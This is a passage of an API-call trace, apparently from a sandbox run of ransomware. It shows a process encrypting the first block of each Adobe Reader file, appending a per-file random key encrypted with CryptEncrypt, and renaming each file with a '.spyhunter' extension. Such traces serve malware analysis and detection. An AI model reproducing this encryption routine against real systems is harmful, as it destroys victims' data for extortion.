dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.142] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY") returned 77 [0117.142] StrStrW (lpFirst="Spelling.SKY", lpSrch=".txt") returned 0x0 [0117.142] GetProcessHeap () returned 0x2c0000 [0117.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0117.142] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf974, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf974*=0x2800, lpOverlapped=0x0) returned 1 [0117.166] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.166] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf974, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf974*=0x2800, lpOverlapped=0x0) returned 1 [0117.166] GetProcessHeap () returned 0x2c0000 [0117.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0117.166] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.166] WriteFile (in: hFile=0x154, lpBuffer=0x25cf9b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf974, lpOverlapped=0x0 | out: lpBuffer=0x25cf9b4*, lpNumberOfBytesWritten=0x25cf974*=0x4, lpOverlapped=0x0) returned 1 [0117.167] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf974, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf974*=0x30, lpOverlapped=0x0) returned 1 [0117.167] CloseHandle (hObject=0x154) returned 1 [0117.167] GetProcessHeap () returned 0x2c0000 [0117.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.167] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY.spyhunter") returned 87 [0117.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\spelling.sky"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Spelling.SKY.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\spelling.sky.spyhunter")) returned 1 [0117.167] GetProcessHeap () returned 0x2c0000 [0117.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.168] GetProcessHeap () returned 0x2c0000 [0117.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.168] GetProcessHeap () returned 0x2c0000 [0117.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e6e398 | out: hHeap=0x2c0000) returned 1 [0117.169] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9b0 | out: pbBuffer=0x25cf9b0) returned 1 [0117.169] GetProcessHeap () returned 0x2c0000 [0117.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.169] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9a8*=0x30) returned 1 [0117.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\weblink.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.171] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR") returned 76 [0117.171] StrStrW (lpFirst="Weblink.TUR", lpSrch=".txt") returned 0x0 [0117.171] GetProcessHeap () returned 0x2c0000 [0117.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.171] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf96c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf96c*=0x2800, lpOverlapped=0x0) returned 1 [0117.213] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.213] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf96c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf96c*=0x2800, lpOverlapped=0x0) returned 1 [0117.213] GetProcessHeap () returned 0x2c0000 [0117.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.213] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.213] WriteFile (in: hFile=0x154, lpBuffer=0x25cf9ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf96c, lpOverlapped=0x0 | out: lpBuffer=0x25cf9ac*, lpNumberOfBytesWritten=0x25cf96c*=0x4, lpOverlapped=0x0) returned 1 [0117.272] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf96c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf96c*=0x30, lpOverlapped=0x0) returned 1 [0117.272] CloseHandle (hObject=0x154) returned 1 [0117.272] GetProcessHeap () returned 0x2c0000 [0117.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.272] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR.spyhunter") returned 86 [0117.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\weblink.tur"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Weblink.TUR.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\weblink.tur.spyhunter")) returned 1 [0117.273] GetProcessHeap () returned 0x2c0000 [0117.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.273] GetProcessHeap () returned 0x2c0000 [0117.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.273] GetProcessHeap () returned 0x2c0000 [0117.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e70128 | out: hHeap=0x2c0000) returned 1 [0117.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9a8 | out: pbBuffer=0x25cf9a8) returned 1 [0117.275] GetProcessHeap () returned 0x2c0000 [0117.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9a0*=0x30) returned 1 [0117.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\weblink.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.276] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS") returned 76 [0117.276] StrStrW (lpFirst="Weblink.CHS", lpSrch=".txt") returned 0x0 [0117.277] GetProcessHeap () returned 0x2c0000 [0117.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.277] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf964*=0x2800, lpOverlapped=0x0) returned 1 [0117.286] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.286] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf964*=0x2800, lpOverlapped=0x0) returned 1 [0117.287] GetProcessHeap () returned 0x2c0000 [0117.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0117.287] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.287] WriteFile (in: hFile=0x154, lpBuffer=0x25cf9a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x25cf9a4*, lpNumberOfBytesWritten=0x25cf964*=0x4, lpOverlapped=0x0) returned 1 [0117.303] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf964*=0x30, lpOverlapped=0x0) returned 1 [0117.303] CloseHandle (hObject=0x154) returned 1 [0117.303] GetProcessHeap () returned 0x2c0000 [0117.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.303] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS.spyhunter") returned 86 [0117.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\weblink.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\weblink.chs.spyhunter")) returned 1 [0117.304] GetProcessHeap () returned 0x2c0000 [0117.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.304] GetProcessHeap () returned 0x2c0000 [0117.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.304] GetProcessHeap () returned 0x2c0000 [0117.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e71518 | out: hHeap=0x2c0000) returned 1 [0117.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9a8 | out: pbBuffer=0x25cf9a8) returned 1 [0117.305] GetProcessHeap () returned 0x2c0000 [0117.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9a0*=0x30) returned 1 [0117.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0117.328] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx") returned 87 [0117.328] StrStrW (lpFirst="Services.asfx", lpSrch=".txt") returned 0x0 [0117.328] GetProcessHeap () returned 0x2c0000 [0117.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0117.328] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf964*=0xe4, lpOverlapped=0x0) returned 1 [0117.329] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.329] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf964*=0xe4, lpOverlapped=0x0) returned 1 [0117.329] GetProcessHeap () returned 0x2c0000 [0117.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0117.329] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.329] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf9a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x25cf9a4*, lpNumberOfBytesWritten=0x25cf964*=0x4, lpOverlapped=0x0) returned 1 [0117.329] WriteFile (in: hFile=0xb4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf964, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf964*=0x30, lpOverlapped=0x0) returned 1 [0117.330] CloseHandle (hObject=0xb4) returned 1 [0117.330] GetProcessHeap () returned 0x2c0000 [0117.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0117.330] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx.spyhunter") returned 97 [0117.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\services.asfx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\services.asfx.spyhunter")) returned 1 [0117.331] GetProcessHeap () returned 0x2c0000 [0117.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0117.331] GetProcessHeap () returned 0x2c0000 [0117.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.331] GetProcessHeap () returned 0x2c0000 [0117.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e68f40 | out: hHeap=0x2c0000) returned 1 [0117.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9a0 | out: pbBuffer=0x25cf9a0) returned 1 [0117.331] GetProcessHeap () returned 0x2c0000 [0117.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf998*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf998*=0x30) returned 1 [0117.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\search.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0117.411] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS") returned 75 [0117.411] StrStrW (lpFirst="Search.CHS", lpSrch=".txt") returned 0x0 [0117.411] GetProcessHeap () returned 0x2c0000 [0117.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.411] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf95c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf95c*=0x2800, lpOverlapped=0x0) returned 1 [0117.426] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.426] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf95c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf95c*=0x2800, lpOverlapped=0x0) returned 1 [0117.426] GetProcessHeap () returned 0x2c0000 [0117.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.426] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.426] WriteFile (in: hFile=0x170, lpBuffer=0x25cf99c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf95c, lpOverlapped=0x0 | out: lpBuffer=0x25cf99c*, lpNumberOfBytesWritten=0x25cf95c*=0x4, lpOverlapped=0x0) returned 1 [0117.427] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf95c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf95c*=0x30, lpOverlapped=0x0) returned 1 [0117.428] CloseHandle (hObject=0x170) returned 1 [0117.428] GetProcessHeap () returned 0x2c0000 [0117.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0117.428] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS.spyhunter") returned 85 [0117.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\search.chs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Search.CHS.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\search.chs.spyhunter")) returned 1 [0117.428] GetProcessHeap () returned 0x2c0000 [0117.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0117.428] GetProcessHeap () returned 0x2c0000 [0117.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.429] GetProcessHeap () returned 0x2c0000 [0117.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e43808 | out: hHeap=0x2c0000) returned 1 [0117.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf998 | out: pbBuffer=0x25cf998) returned 1 [0117.468] GetProcessHeap () returned 0x2c0000 [0117.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf990*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf990*=0x30) returned 1 [0117.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\adobepdf417.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.469] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp") returned 89 [0117.469] StrStrW (lpFirst="AdobePDF417.pmp", lpSrch=".txt") returned 0x0 [0117.469] GetProcessHeap () returned 0x2c0000 [0117.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.469] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf954, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf954*=0x2800, lpOverlapped=0x0) returned 1 [0117.495] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.495] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf954, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf954*=0x2800, lpOverlapped=0x0) returned 1 [0117.495] GetProcessHeap () returned 0x2c0000 [0117.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.496] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.496] WriteFile (in: hFile=0x154, lpBuffer=0x25cf994*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf954, lpOverlapped=0x0 | out: lpBuffer=0x25cf994*, lpNumberOfBytesWritten=0x25cf954*=0x4, lpOverlapped=0x0) returned 1 [0117.506] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf954, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf954*=0x30, lpOverlapped=0x0) returned 1 [0117.506] CloseHandle (hObject=0x154) returned 1 [0117.507] GetProcessHeap () returned 0x2c0000 [0117.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0117.507] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp.spyhunter") returned 99 [0117.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\adobepdf417.pmp"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\adobepdf417.pmp.spyhunter")) returned 1 [0117.507] GetProcessHeap () returned 0x2c0000 [0117.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0117.507] GetProcessHeap () returned 0x2c0000 [0117.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0117.507] GetProcessHeap () returned 0x2c0000 [0117.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e54060 | out: hHeap=0x2c0000) returned 1 [0117.508] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf990 | out: pbBuffer=0x25cf990) returned 1 [0117.508] GetProcessHeap () returned 0x2c0000 [0117.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0117.508] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf988*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf988*=0x30) returned 1 [0117.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0117.508] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf") returned 96 [0117.508] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0117.508] GetProcessHeap () returned 0x2c0000 [0117.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0117.508] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, 